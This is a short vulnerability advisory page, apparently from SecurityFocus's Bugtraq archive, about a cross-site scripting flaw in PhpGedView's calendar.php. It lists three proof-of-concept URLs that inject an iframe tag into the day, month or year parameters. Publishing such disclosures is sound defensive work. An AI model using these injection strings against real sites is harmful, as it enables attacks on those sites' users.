Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PhpGedView Calendar.PHP Cross-Site Scripting Vulnerability

No exploit is required and the following proof of concepts are available:

http://www.example.com/phpgedview/calendar.php?action=today&day=1&month=jan&year="><iframe>
http://www.example.com/phpgedview/calendar.php?action=today&day=1&month=<iframe>
http://www.example.com/phpgedview/calendar.php?action=today&day=<iframe>







 

Privacy Statement
Copyright 2008, SecurityFocus